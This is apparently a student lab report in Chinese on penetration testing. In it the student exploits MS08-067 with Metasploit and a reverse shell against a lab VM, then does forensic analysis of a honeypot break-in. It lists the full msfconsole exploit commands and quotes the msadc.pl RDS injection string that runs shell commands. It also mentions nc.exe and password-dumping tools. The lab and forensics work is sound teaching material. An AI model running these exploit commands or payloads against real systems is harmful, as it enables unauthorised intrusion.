20251913 2025-2026-2 《网络攻防实践》第6次作业

1.实践内容

(1)动手实践Metasploit windows attacker

任务:使用metasploit软件进行windows远程渗透统计实验

具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权。

MS08-067漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成栈缓冲区内存错误,从而被利用实施远程代码执行。当用户在受影响的系统上收到RPC请求时,该漏洞会允许远程执行代码,攻击者可以在未经身份验证情况下利用此漏洞运行任意代码。

(2)取证分析实践:解码一次成功的NT系统破解攻击。

来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击
攻击者如何使用这个破解工具进入并控制了系统
攻击者获得系统访问权限后做了什么
我们如何防止这样的攻击
你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么

(3)团队对抗实践:windows系统远程渗透攻击和分析。

攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)

防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。

2.实践过程

2.1 实践Metasploit

实验用到的虚拟机IP地址如下

虚拟机 IP
Kali 192.168.200.4
Windows2k 192.168.200.10

1、测试攻击机和靶机之间的连通性
image

image
2、在KALI输入命令msfconsole进入Metasploit
image
3、输入命令search ms08-067来查看MS08-067漏洞
image
4、输入命令show options可以查看可选择的操作
image
5、输入命令show payloads可以显示可用的攻击载荷
image
6、输入命令use exploit/windows/smb/ms08_067_netapi来使用针对ms08-067漏洞的攻击脚本,并输入命令set payload generic/shell_reverse_tcp来选择要使用的攻击载荷
image
7、输入命令set RHOST 192.168.200.10通过IP来指定靶机,输入命令set LHOET 192.168.200.4再来指定本机
image
8、输入命令show options可以查看到是否配置成功,此时表示已经配置成功了
image
9、输入命令exploit来进行攻击
image
10、此时可以远程操纵windows靶机,输入命令ipconfig来查看靶机的IP地址
image

2.2 取证分析实践

1、攻击者使用什么工具进行攻击
先下载学习通资料中的snort-0204@0117.log,拖进kali中,通过wireshark打开snort-0204@0117.log,输入命令ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106进行过滤,过滤后可以看到存在TCP和HTTP协议数据包
image
在117HTTP数据包中可以看到在Unicode编码中对应符号/的字符%C0%AF,分析推测这是攻击者在利用Unicode攻击访问boot.ini文件
image
在140数据包中可以看到攻击者在尝试获得msadcs.dll文件
image
追踪到149数据包可以看到攻击者输入了sql语句
再查询后面的特殊字符串ADM!ROX!YOUR!WORLD!,发现攻击者是利用了msadc2.pl渗透代码发起的攻击
image
提取出进行分析:

select from customers where city='|shell("cmd /c echo werd >> c:\fun")|driver={Microsoft Access driver (*.mdb)};dbp=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
# select为sql命令;然后输入shell指令
# "cmd /c echo werd >> c:\fun"是在取得系统的访问权限
# driver={Microsoft Access driver (*.mdb)}是在使用Microsoft Access driver (*.mdb)的驱动
# dbp=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb是在使用这个dbp文件

2、攻击者如何使用这个工具进入并控制了系统
通过命令ip.addr == 213.116.251.162 && http过滤http数据包,观察可以发现,从每一次攻击的时间都很短,推测攻击者先将指令写入shell脚本,再将这个脚本与msadc.pl攻击脚本一起执行
image
通过命令ip.addr == 213.116.251.162 && ftp过滤ftp数据包,追踪可以看到攻击者在通过ftp传输文件,分别是nc.exe,pdump.exe,samdump.dll,这里是在进行口令破解和提权,pdump.exe和samdump.dll是配合使用破解口令的。nc.exe则是一个远程入侵的后门程序,便于下次攻击。
image
3、攻击者获得系统访问权限后做了什么
查看http包,发现攻击者在连接6969端口,因此利用命令tcp.port == 6969来过滤
image
追踪TCP流可以看到攻击者输入的相关命令,创建会话写入文件yay.txt,然后又尝试删除SAM文件和拷贝har.txt文件
image
image
4、我们如何防止这样的攻击

  • 设置强口令,增加破解难度
  • 定期打补丁,修复漏洞
  • 定期扫描主机,查看是否存在漏洞
  • 启用安全事件日志,将日志发送到 SIEM

5、你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么
通过命令tcp.stream eq 174追踪174号TCP流,发现攻击者发送了图中的命令,可见,攻击者已经警觉了他的目标是一台蜜罐主机
image

2.3 团队对抗实践

设置攻击机为192.168.200.4,靶机为192.168.200.10
输入命令:

msfconsole
use exploit/windows/smb/ms08_067_netapi
set payload generic/shell_reverse_tcp
set RHOST 192.168.200.10
set LHOST 192.168.200.4
exploit

image

再输入命令:

mkdir zc
cd zc
echo helloworld:) >>zc.txt

image

靶机中得到:
image

在攻击过程中同时打开wireshark收集数据包,攻击机可以查看数据包,追踪TCP流可以看到攻击机的操作
image

3.学习中遇到的问题及解决

  • 问题:无法ping通kali机
  • 问题解决方案:将kali和Windows2k都设置在同一个网段内

4.实践总结

本次实验围绕Windows系统远程渗透攻击与取证分析展开,通过三个实践任务,逐步深入掌握了Metasploit框架的使用、高危漏洞的利用、攻击过程的取证分析及团队对抗中的攻防技巧。

在动手实践Metasploit攻击中,理解了缓冲区溢出漏洞的危害,掌握了漏洞利用的基本流程;在取证分析中,我们学会了从日志、网络流量中提取攻击信息,还原攻击过程,并提出了针对性的防范措施;在团队对抗中,体会到了攻防双方的博弈,提升了实操能力和团队协作能力。

通过本次实验,我们深刻认识到,网络安全是一个系统性的工程,既要重视技术层面的防护,也要加强人员的安全意识。未来,我们将继续深入学习网络安全相关知识,提升自身的攻防能力,为网络安全防护贡献力量。

posted @ 2026-04-22 15:44  山楂糖葫芦  阅读(3)  评论(0)    收藏  举报